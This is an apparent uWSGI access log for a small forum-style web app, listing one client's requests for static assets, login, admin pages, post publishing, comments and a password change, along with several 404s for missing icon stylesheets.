0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3411] 180.160.48.43 () {40 vars in 840 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3412] 180.160.48.43 () {40 vars in 852 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3413] 180.160.48.43 () {40 vars in 858 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2501/3414] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2502/3415] 180.160.48.43 () {38 vars in 803 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2503/3416] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2504/3417] 180.160.48.43 () {38 vars in 879 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2505/3418] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 13:33:44 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2506/3419] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 13:33:44 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2507/3420] 180.160.48.43 () {38 vars in 847 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2508/3421] 180.160.48.43 () {38 vars in 839 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2509/3422] 180.160.48.43 () {38 vars in 823 bytes} [Thu Jan 14 13:33:44 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3423] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 13:33:44 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3424] 180.160.48.43 () {40 vars in 792 bytes} [Thu Jan 14 13:33:44 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3425] 180.160.48.43 () {40 vars in 804 bytes} [Thu Jan 14 13:33:44 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3426] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3427] 180.160.48.43 () {40 vars in 876 bytes} [Thu Jan 14 13:33:44 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3428] 180.160.48.43 () {40 vars in 802 bytes} [Thu Jan 14 13:33:44 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +delete +[pid: 15176|app: 0|req: 2510/3429] 180.160.48.43 () {48 vars in 973 bytes} [Thu Jan 14 13:33:48 2021] POST /admin-home/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2511/3430] 180.160.48.43 () {40 vars in 888 bytes} [Thu Jan 14 13:33:48 2021] GET /admin-home/ => generated 22360 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2512/3431] 180.160.48.43 () {38 vars in 835 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2513/3432] 180.160.48.43 () {38 vars in 846 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2514/3433] 180.160.48.43 () {38 vars in 837 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2515/3434] 180.160.48.43 () {38 vars in 801 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2516/3435] 180.160.48.43 () {38 vars in 822 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2517/3436] 180.160.48.43 () {38 vars in 822 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2518/3437] 180.160.48.43 () {38 vars in 878 bytes} [Thu Jan 14 13:33:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2519/3438] 180.160.48.43 () {38 vars in 770 bytes} [Thu Jan 14 13:33:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2520/3439] 180.160.48.43 () {38 vars in 768 bytes} [Thu Jan 14 13:33:48 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2521/3440] 180.160.48.43 () {38 vars in 825 bytes} [Thu Jan 14 13:35:58 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2522/3441] 180.160.48.43 () {38 vars in 863 bytes} [Thu Jan 14 13:36:48 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3442] 180.160.48.43 () {40 vars in 863 bytes} [Thu Jan 14 13:36:48 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3443] 180.160.48.43 () {40 vars in 885 bytes} [Thu Jan 14 13:36:48 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3444] 180.160.48.43 () {40 vars in 867 bytes} [Thu Jan 14 13:36:48 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3445] 180.160.48.43 () {40 vars in 865 bytes} [Thu Jan 14 13:36:48 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3446] 180.160.48.43 () {40 vars in 871 bytes} [Thu Jan 14 13:36:48 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3447] 180.160.48.43 () {40 vars in 846 bytes} [Thu Jan 14 13:36:48 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3448] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:36:48 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3449] 180.160.48.43 () {40 vars in 852 bytes} [Thu Jan 14 13:36:48 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3450] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 13:36:48 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3451] 180.160.48.43 () {40 vars in 844 bytes} [Thu Jan 14 13:36:48 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3452] 180.160.48.43 () {40 vars in 906 bytes} [Thu Jan 14 13:36:48 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2523/3453] 180.160.48.43 () {48 vars in 1007 bytes} [Thu Jan 14 13:39:32 2021] POST /login/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2524/3454] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 13:39:32 2021] GET /home/ => generated 10471 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3455] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 13:39:32 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3456] 180.160.48.43 () {40 vars in 893 bytes} [Thu Jan 14 13:39:32 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2525/3457] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:39:39 2021] GET /single-an-6 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2526/3458] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 13:39:39 2021] GET /single-an-6/ => generated 3307 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2527/3459] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 13:39:47 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2528/3460] 180.160.48.43 () {48 vars in 1007 bytes} [Thu Jan 14 13:41:00 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2529/3461] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 13:41:00 2021] GET /home/ => generated 10471 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2530/3462] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:41:05 2021] GET /single-an-2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2531/3463] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 13:41:05 2021] GET /single-an-2/ => generated 3110 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2532/3464] 180.160.48.43 () {40 vars in 916 bytes} [Thu Jan 14 13:41:11 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3465] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 13:41:30 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +一个帖子 这是一个帖子 +[pid: 15176|app: 0|req: 2533/3466] 180.160.48.43 () {48 vars in 1099 bytes} [Thu Jan 14 13:41:44 2021] POST /publish/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 203 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2534/3467] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 13:41:44 2021] GET /single/17 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2535/3468] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 13:41:44 2021] GET /single/17/ => generated 9353 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3469] 180.160.48.43 () {40 vars in 864 bytes} [Thu Jan 14 13:41:44 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3470] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 13:41:44 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3471] 180.160.48.43 () {38 vars in 853 bytes} [Thu Jan 14 13:41:44 2021] GET /static/img/t_photo/17_seeseeme.png => generated 7285 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +here +[pid: 15176|app: 0|req: 2536/3472] 180.160.48.43 () {48 vars in 1019 bytes} [Thu Jan 14 13:41:48 2021] POST /single/17/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2537/3473] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 13:41:48 2021] GET /single/17/ => generated 9353 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3474] 180.160.48.43 () {40 vars in 906 bytes} [Thu Jan 14 13:41:48 2021] GET /static/img/t_photo/17_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2538/3475] 180.160.48.43 () {48 vars in 1105 bytes} [Thu Jan 14 13:42:06 2021] POST /single/17/ => generated 0 bytes in 48 msecs (HTTP/1.1 302) 7 headers in 203 bytes (4 switches on core 0) +[pid: 15176|app: 0|req: 2539/3476] 180.160.48.43 () {42 vars in 953 bytes} [Thu Jan 14 13:42:06 2021] GET /single/17 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2540/3477] 180.160.48.43 () {42 vars in 955 bytes} [Thu Jan 14 13:42:06 2021] GET /single/17/ => generated 9874 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3478] 180.160.48.43 () {40 vars in 907 bytes} [Thu Jan 14 13:42:06 2021] GET /static/img/t_photo/17_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3479] 180.160.48.43 () {38 vars in 850 bytes} [Thu Jan 14 13:42:06 2021] GET /static/img/r_photo/28_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2541/3480] 180.160.48.43 () {40 vars in 914 bytes} [Thu Jan 14 13:42:14 2021] GET /home/ => generated 10471 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2542/3481] 180.160.48.43 () {40 vars in 917 bytes} [Thu Jan 14 13:42:16 2021] GET /all-0-0-0 => generated 14053 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3482] 180.160.48.43 () {40 vars in 894 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3483] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3484] 180.160.48.43 () {38 vars in 841 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3485] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3486] 180.160.48.43 () {40 vars in 972 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3487] 180.160.48.43 () {40 vars in 906 bytes} [Thu Jan 14 13:42:16 2021] GET /static/img/t_photo/17_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2543/3488] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:42:24 2021] GET /all-6-0-0 => generated 9991 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2544/3489] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:42:27 2021] GET /single/4/ => generated 9939 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3490] 180.160.48.43 () {38 vars in 907 bytes} [Thu Jan 14 13:42:27 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 540541 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2545/3491] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 13:42:38 2021] GET /ownpublish-0-0-0 => generated 10329 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3492] 180.160.48.43 () {40 vars in 913 bytes} [Thu Jan 14 13:42:38 2021] GET /static/img/t_photo/17_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2546/3493] 180.160.48.43 () {48 vars in 1036 bytes} [Thu Jan 14 13:42:42 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2547/3494] 180.160.48.43 () {40 vars in 942 bytes} [Thu Jan 14 13:42:42 2021] GET /ownpublish-0-0-0 => generated 9830 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2548/3495] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 13:42:46 2021] GET /all-0-0-0 => generated 13670 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2549/3496] 180.160.48.43 () {48 vars in 1065 bytes} [Thu Jan 14 13:42:52 2021] POST /all-0-0-0 => generated 9987 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2550/3497] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:42:54 2021] GET /single/1/ => generated 9421 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2551/3498] 180.160.48.43 () {40 vars in 913 bytes} [Thu Jan 14 13:43:04 2021] GET /home/ => generated 10471 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2552/3499] 180.160.48.43 () {40 vars in 916 bytes} [Thu Jan 14 13:43:05 2021] GET /edit-pwd => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2553/3500] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 13:43:05 2021] GET /edit-pwd/ => generated 6904 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2554/3501] 180.160.48.43 () {48 vars in 1066 bytes} [Thu Jan 14 13:43:16 2021] POST /edit-pwd/ => generated 0 bytes in 12 msecs (HTTP/1.1 302) 7 headers in 198 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2555/3502] 180.160.48.43 () {48 vars in 1016 bytes} [Thu Jan 14 13:43:16 2021] POST /edit-pwd/ => generated 0 bytes in 9 msecs (HTTP/1.1 302) 7 headers in 198 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2556/3503] 180.160.48.43 () {42 vars in 943 bytes} [Thu Jan 14 13:43:16 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2557/3504] 180.160.48.43 () {42 vars in 881 bytes} [Thu Jan 14 13:43:16 2021] GET /home/ => generated 10471 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2558/3505] 180.160.48.43 () {42 vars in 945 bytes} [Thu Jan 14 13:43:16 2021] GET /home/ => generated 10471 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2559/3506] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 13:43:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2560/3507] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 13:43:25 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 15176|app: 0|req: 2561/3508] 180.160.48.43 () {38 vars in 806 bytes} [Thu Jan 14 13:43:25 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2562/3509] 180.160.48.43 () {48 vars in 1016 bytes} [Thu Jan 14 13:43:32 2021] POST /my-admin/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2563/3510] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 13:43:32 2021] GET /admin-home/ => generated 22360 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3511] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3512] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3513] 180.160.48.43 () {40 vars in 872 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3514] 180.160.48.43 () {40 vars in 901 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3515] 180.160.48.43 () {40 vars in 907 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3516] 180.160.48.43 () {40 vars in 865 bytes} [Thu Jan 14 13:43:32 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3517] 180.160.48.43 () {40 vars in 841 bytes} [Thu Jan 14 13:43:32 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3518] 180.160.48.43 () {40 vars in 853 bytes} [Thu Jan 14 13:43:32 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2564/3519] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) 